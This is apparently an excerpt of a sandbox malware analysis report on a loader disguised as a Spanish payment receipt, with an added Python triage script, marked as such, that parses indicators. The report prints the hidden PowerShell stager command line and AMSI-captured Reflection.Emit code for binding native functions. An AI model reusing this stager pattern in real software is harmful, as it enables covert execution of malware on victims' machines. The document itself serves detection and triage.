            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | File opened: C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorrc.dll
            Source: Justificante pago-09453256434687.exe | Static file information: File size 1106880 > 1048576
            Source: Justificante pago-09453256434687.exe | Static PE information: DYNAMIC_BASE, NX_COMPAT, NO_SEH, TERMINAL_SERVER_AWARE
            Source: Binary string: C:\Windows\System.Core.pdb source: powershell.exe, 00000001.00000002.2065851466.000000000823C000.00000004.00000020.00020000.00000000.sdmp
            Source: Binary string: \??\C:\Windows\Microsoft.Net\assembly\GAC_MSIL\System.Core\v4.0_4.0.0.0__b77a5c561934e089\System.Core.pdb\c source: powershell.exe, 00000001.00000002.2065851466.0000000008272000.00000004.00000020.00020000.00000000.sdmp
            Source: Binary string: stem.Core.pdb source: powershell.exe, 00000001.00000002.2065851466.000000000823C000.00000004.00000020.00020000.00000000.sdmp
            Source: Binary string: \??\C:\Windows\Microsoft.Net\assembly\GAC_MSIL\System.Core\v4.0_4.0.0.0__b77a5c561934e089\System.Core.pdb source: powershell.exe, 00000001.00000002.2065851466.0000000008272000.00000004.00000020.00020000.00000000.sdmp

            Data Obfuscation

            Source: Yara match | File source: 00000001.00000002.2067270709.0000000009B22000.00000040.00001000.00020000.00000000.sdmp, type: MEMORY
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | Anti Malware Scan Interface: GetDelegateForFunctionPointer((Skattekoden $Sipped $newsgirls), (Cirkler @([IntPtr], [UInt32], [UInt32], [UInt32]) ([IntPtr])))$global:Thysanouran = [AppDomain]::CurrentDomain.GetAssemblies()$global:A
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | Anti Malware Scan Interface: DefineDynamicAssembly((New-Object System.Reflection.AssemblyName($chanceled)), $Hydrophilism).DefineDynamicModule($Pasodoble, $false).DefineType($Kiwitrtes203, $Dybdeboring, [System.MulticastDelegate]
            Source: C:\Users\user\Desktop\Justificante pago-09453256434687.exe | Process created: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe powershell.exe -windowstyle hidden "$Subwayed=gc -raw 'C:\Users\user\AppData\Local\Temp\globosely\baadehavn\stnner\Forhaandsudtalelses.Pot162';$Raadslagningens=$Subwayed.SubString(68150,3);.$Raadslagningens($Subwayed) "
            Source: C:\Users\user\Desktop\Justificante pago-09453256434687.exe | Process created: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe powershell.exe -windowstyle hidden "$Subwayed=gc -raw 'C:\Users\user\AppData\Local\Temp\globosely\baadehavn\stnner\Forhaandsudtalelses.Pot162';$Raadslagningens=$Subwayed.SubString(68150,3);.$Raadslagningens($Subwayed) "
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | Code function: 1_2_00D1A5B2 push eax; iretd 1_2_00D1A6B1
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | Code function: 1_2_00D1A627 push eax; iretd 1_2_00D1A6B1
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | Code function: 1_2_00D1EA19 push eax; mov dword ptr [esp], edx 1_2_00D1EA2C
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | Code function: 1_2_070A4365 push eax; retf 1_2_070A4379
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | Code function: 1_2_070A0FC4 push es; iretd 1_2_070A0FC7
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | Code function: 1_2_08FB56A5 push ebp; iretd 1_2_08FB56B4
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | Code function: 1_2_08FB6C44 push ecx; ret 1_2_08FB6C45
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | Code function: 1_2_08FB5E0B push ebx; ret 1_2_08FB5E0C
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | Code function: 1_2_08FB3D9A push esp; iretd 1_2_08FB3D97
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | Code function: 1_2_08FB3D69 push esp; iretd 1_2_08FB3D97
            Source: C:\Windows\SysWOW64\msiexec.exe | Code function: 6_2_042E6C44 push ecx; ret 6_2_042E6C45
            Source: C:\Windows\SysWOW64\msiexec.exe | Code function: 6_2_042E3D69 push esp; iretd 6_2_042E3D97
            Source: C:\Windows\SysWOW64\msiexec.exe | Code function: 6_2_042E3D9A push esp; iretd 6_2_042E3D97
            Source: C:\Windows\SysWOW64\msiexec.exe | Code function: 6_2_042E5E0B push ebx; ret 6_2_042E5E0C
            Source: C:\Windows\SysWOW64\msiexec.exe | Code function: 6_2_042E56A5 push ebp; iretd 6_2_042E56B4
            Source: C:\Users\user\Desktop\Justificante pago-09453256434687.exe | File created: C:\Users\user\AppData\Local\Temp\nsj887A.tmp\nsExec.dll
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | File created: C:\Users\user\AppData\Local\Temp\globosely\baadehavn\stnner\forslvedes\Justificante pago-09453256434687.exe
            Source: C:\Users\user\Desktop\Justificante pago-09453256434687.exe | File created: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\semitelic.ini
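            The two findings above that matter most for triage are the stage-1 command line (powershell.exe reads the dropped .Pot162 file with gc -raw, takes SubString(68150,3) from it and dot-invokes that token with the whole blob as argument) and the AMSI-captured script text, which builds a delegate type with Reflection.Emit and binds a native function pointer through GetDelegateForFunctionPointer instead of Add-Type. The following Python script is an added example, not part of the Joe Sandbox report or of the sample: it parses that command line, reproduces the SubString() extraction on a constructed stand-in for the .Pot162 file (the real content is not on this page, so the assumption that the 3-character token is "iex" is exactly that), and scans script-block text for the dynamic-code indicators. Two caveats it encodes: gc -raw hands .NET a decoded string, so the offset is a UTF-16 code-unit index rather than a byte offset, and a BOM-less file is decoded by Windows PowerShell 5.1 with the ANSI code page (assumed cp1252 here). The indicator list extends the four names that appear in the report with a few companion Reflection.Emit calls, which is an assumption about this loader family rather than something the report shows.

```python
"""Triage helpers for the GuLoader-style PowerShell stager recorded in this report.

Added example (not part of the Joe Sandbox report or the sample). It parses the
stage-1 command line, recovers the token that SubString() extracts from the dropped
.Pot162 file, and scans AMSI-captured script text for Reflection.Emit indicators.
"""
import re
from dataclasses import dataclass
from typing import Optional

# Verbatim from the report's "Process created" entry for powershell.exe.
REPORTED_CMDLINE = (
    'powershell.exe -windowstyle hidden "$Subwayed=gc -raw '
    "'C:\\Users\\user\\AppData\\Local\\Temp\\globosely\\baadehavn\\stnner\\Forhaandsudtalelses.Pot162';"
    '$Raadslagningens=$Subwayed.SubString(68150,3);.$Raadslagningens($Subwayed) "'
)

# Fragments of the two "Anti Malware Scan Interface" entries in the Data Obfuscation section.
AMSI_EXCERPTS = (
    "GetDelegateForFunctionPointer((Skattekoden $Sipped $newsgirls), "
    "(Cirkler @([IntPtr], [UInt32], [UInt32], [UInt32]) ([IntPtr])))"
    "$global:Thysanouran = [AppDomain]::CurrentDomain.GetAssemblies()\n"
    "DefineDynamicAssembly((New-Object System.Reflection.AssemblyName($chanceled)), $Hydrophilism)"
    ".DefineDynamicModule($Pasodoble, $false).DefineType($Kiwitrtes203, $Dybdeboring, [System.MulticastDelegate]"
)

# "$var = gc -raw '<path>' ... .SubString(<offset>,<length>)"; gc/cat/type are Get-Content aliases.
STAGER_RE = re.compile(
    r"(?P<var>\$\w+)\s*=\s*(?:gc|cat|type|Get-Content)\s+-raw\s+'(?P<path>[^']+)'"
    r".*?\.SubString\((?P<off>\d+)\s*,\s*(?P<len>\d+)\)",
    re.IGNORECASE | re.DOTALL,
)

# Tokens through which ". $token($blob)" executes the blob's content.
INVOCATION_TOKENS = {"iex", "invoke-expression", ".", "&"}

# Calls used to bind native APIs without Add-Type. The first five appear verbatim in this
# report; the remaining ones are assumed companions in the same Reflection.Emit pattern.
DYNAMIC_CODE_INDICATORS = (
    "GetDelegateForFunctionPointer", "DefineDynamicAssembly", "DefineDynamicModule",
    "DefineType", "MulticastDelegate", "DefineConstructor", "DefineMethod", "GetProcAddress",
)


@dataclass
class Stager:
    var: str
    path: str
    offset: int
    length: int


def parse_stager(cmdline: str) -> Optional[Stager]:
    """Extract the blob path and SubString(offset, length) from a stage-1 command line."""
    m = STAGER_RE.search(cmdline)
    if not m:
        return None
    return Stager(m["var"], m["path"], int(m["off"]), int(m["len"]))


def recover_token(raw: bytes, offset: int, length: int, encoding: str = "cp1252") -> str:
    """Reproduce $blob.SubString(offset, length) on the decoded file content.

    .NET String.Substring indexes UTF-16 code units, so the decoded text is re-encoded as
    UTF-16LE and sliced two bytes per unit. Assumption: a BOM-less file is decoded with the
    ANSI code page (cp1252); errors="replace" keeps one char per undefined byte so the
    offsets stay aligned with what PowerShell computed.
    """
    text = raw.decode(encoding, errors="replace")
    units = text.encode("utf-16-le")
    return units[offset * 2:(offset + length) * 2].decode("utf-16-le", errors="replace")


def is_invocation_token(token: str) -> bool:
    return token.strip().lower() in INVOCATION_TOKENS


def scan_script_block(text: str) -> list:
    """Return the dynamic-code indicators present in AMSI/ScriptBlock text, in table order."""
    return [name for name in DYNAMIC_CODE_INDICATORS if name in text]


def build_sample_stage(offset: int = 68150, token: bytes = b"iex") -> bytes:
    """Constructed stand-in for Forhaandsudtalelses.Pot162 (its real content is not on the page)."""
    return b"#" * offset + token + b"\r\n# remainder of the obfuscated stage\r\n"


def triage(cmdline: str, raw: bytes) -> dict:
    """Combine the two checks: is this a SubString stager, and does the token invoke the blob?"""
    st = parse_stager(cmdline)
    if st is None:
        return {"stager": False}
    tok = recover_token(raw, st.offset, st.length)
    return {"stager": True, "path": st.path, "offset": st.offset,
            "token": tok, "invokes_blob": is_invocation_token(tok)}


if __name__ == "__main__":
    print(triage(REPORTED_CMDLINE, build_sample_stage()))
    print(scan_script_block(AMSI_EXCERPTS))
```

            On a real case, replace build_sample_stage() with the bytes of the dropped file from the sandbox's file collection; if the recovered token is not an invocation alias, the offset was most likely computed on a differently decoded string (check for a BOM and the code page of the victim image before assuming the sample is damaged).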

            Hooking and other Techniques for Hiding and Protection

            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | File opened: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\Modules\BitLocker\BitLocker.psd1
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | File opened: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\Modules\BitLocker\BitLocker.psd1
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | File opened: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\Modules\BitLocker\BitLocker.psd1
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | File opened: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\Modules\BitLocker\en-US\BitLocker.psd1
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | File opened: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\Modules\BitLocker\en-US\BitLocker.psd1
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | File opened: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\Modules\BitLocker\BitLocker.psd1
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | File opened: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\Modules\BitLocker\en-US\BitLocker.psd1
            Source: C:\Users\user\Desktop\Justificante pago-09453256434687.exe | Process information set: NOOPENFILEERRORBOX
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | Process information set: NOOPENFILEERRORBOX
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | Process information set: NOOPENFILEERRORBOX
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | Process information set: NOOPENFILEERRORBOX
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | Process information set: NOOPENFILEERRORBOX
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | Process information set: NOOPENFILEERRORBOX
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | Process information set: NOOPENFILEERRORBOX
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | Process information set: NOOPENFILEERRORBOX
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | Process information set: NOOPENFILEERRORBOX
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | Process information set: NOOPENFILEERRORBOX
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | Process information set: NOOPENFILEERRORBOX
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | Process information set: NOOPENFILEERRORBOX
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | Process information set: NOOPENFILEERRORBOX
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | Process information set: NOOPENFILEERRORBOX
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | Process information set: NOOPENFILEERRORBOX
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | Process information set: NOOPENFILEERRORBOX
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | Process information set: NOOPENFILEERRORBOX
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | Process information set: NOOPENFILEERRORBOX
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | Process information set: NOOPENFILEERRORBOX
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | Process information set: NOOPENFILEERRORBOX
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | Process information set: NOOPENFILEERRORBOX
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | Process information set: NOOPENFILEERRORBOX
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | Process information set: NOOPENFILEERRORBOX
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | Process information set: NOOPENFILEERRORBOX
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | Process information set: NOOPENFILEERRORBOX
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | Process information set: NOOPENFILEERRORBOX
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | Process information set: NOOPENFILEERRORBOX
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | Process information set: NOOPENFILEERRORBOX
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | Process information set: NOOPENFILEERRORBOX
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | Process information set: NOOPENFILEERRORBOX
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | Process information set: NOOPENFILEERRORBOX
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | Process information set: NOOPENFILEERRORBOX
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | Process information set: NOOPENFILEERRORBOX
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | Process information set: NOOPENFILEERRORBOX
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | Process information set: NOOPENFILEERRORBOX
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | Process information set: NOOPENFILEERRORBOX
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | Process information set: NOOPENFILEERRORBOX
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | Process information set: NOOPENFILEERRORBOX
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | Process information set: NOOPENFILEERRORBOX
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | Process information set: NOOPENFILEERRORBOX
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | Process information set: NOOPENFILEERRORBOX
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | Process information set: NOOPENFILEERRORBOX
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | Process information set: NOOPENFILEERRORBOX
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | Process information set: NOOPENFILEERRORBOX
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | Process information set: NOOPENFILEERRORBOX
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | Process information set: NOOPENFILEERRORBOX
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | Process information set: NOOPENFILEERRORBOX
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | Process information set: NOOPENFILEERRORBOX
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | Process information set: NOOPENFILEERRORBOX
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | Process information set: NOOPENFILEERRORBOX
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | Process information set: NOOPENFILEERRORBOX
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | Process information set: NOOPENFILEERRORBOX
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | Process information set: NOOPENFILEERRORBOX
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | Process information set: NOOPENFILEERRORBOX
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | Process information set: NOOPENFILEERRORBOX
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | Process information set: NOOPENFILEERRORBOX
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | Process information set: NOOPENFILEERRORBOX
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | Process information set: NOOPENFILEERRORBOX
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | Process information set: NOOPENFILEERRORBOX
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | Process information set: NOOPENFILEERRORBOX
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | Process information set: NOOPENFILEERRORBOX
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | Process information set: NOOPENFILEERRORBOX
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | Process information set: NOOPENFILEERRORBOX
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | Process information set: NOOPENFILEERRORBOX
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | Process information set: NOOPENFILEERRORBOX
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | Process information set: NOOPENFILEERRORBOX
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | Process information set: NOOPENFILEERRORBOX
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | Process information set: NOOPENFILEERRORBOX
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | Process information set: NOOPENFILEERRORBOX
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\SysWOW64\msiexec.exe Process information set: NOOPENFILEERRORBOX
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Thread delayed: delay time: 922337203685477
            Source: C:\Windows\SysWOW64\msiexec.exe Thread delayed: delay time: 922337203685477
            Source: C:\Windows\SysWOW64\msiexec.exe Thread delayed: delay time: 600000
            Source: C:\Windows\SysWOW64\msiexec.exe Thread delayed: delay time: 599890
            Source: C:\Windows\SysWOW64\msiexec.exe Thread delayed: delay time: 599781
            Source: C:\Windows\SysWOW64\msiexec.exe Thread delayed: delay time: 599672
            Source: C:\Windows\SysWOW64\msiexec.exe Thread delayed: delay time: 599562
            Source: C:\Windows\SysWOW64\msiexec.exe Thread delayed: delay time: 599453
            Source: C:\Windows\SysWOW64\msiexec.exe Thread delayed: delay time: 599344
            Source: C:\Windows\SysWOW64\msiexec.exe Thread delayed: delay time: 599234
            Source: C:\Windows\SysWOW64\msiexec.exe Thread delayed: delay time: 599125
            Source: C:\Windows\SysWOW64\msiexec.exe Thread delayed: delay time: 599015
            Source: C:\Windows\SysWOW64\msiexec.exe Thread delayed: delay time: 598906
            Source: C:\Windows\SysWOW64\msiexec.exe Thread delayed: delay time: 598797
            Source: C:\Windows\SysWOW64\msiexec.exe Thread delayed: delay time: 598687
            Source: C:\Windows\SysWOW64\msiexec.exe Thread delayed: delay time: 598578
            Source: C:\Windows\SysWOW64\msiexec.exe Thread delayed: delay time: 598468
            Source: C:\Windows\SysWOW64\msiexec.exe Thread delayed: delay time: 598359
            Source: C:\Windows\SysWOW64\msiexec.exe Thread delayed: delay time: 598250
            Source: C:\Windows\SysWOW64\msiexec.exe Thread delayed: delay time: 598140
            Source: C:\Windows\SysWOW64\msiexec.exe Thread delayed: delay time: 598031
            Source: C:\Windows\SysWOW64\msiexec.exe Thread delayed: delay time: 597922
            Source: C:\Windows\SysWOW64\msiexec.exe Thread delayed: delay time: 597812
            Source: C:\Windows\SysWOW64\msiexec.exe Thread delayed: delay time: 597703
            Source: C:\Windows\SysWOW64\msiexec.exe Thread delayed: delay time: 597593
            Source: C:\Windows\SysWOW64\msiexec.exe Thread delayed: delay time: 597484
            Source: C:\Windows\SysWOW64\msiexec.exe Thread delayed: delay time: 597375
            Source: C:\Windows\SysWOW64\msiexec.exe Thread delayed: delay time: 597265
            Source: C:\Windows\SysWOW64\msiexec.exe Thread delayed: delay time: 597156
            Source: C:\Windows\SysWOW64\msiexec.exe Thread delayed: delay time: 597047
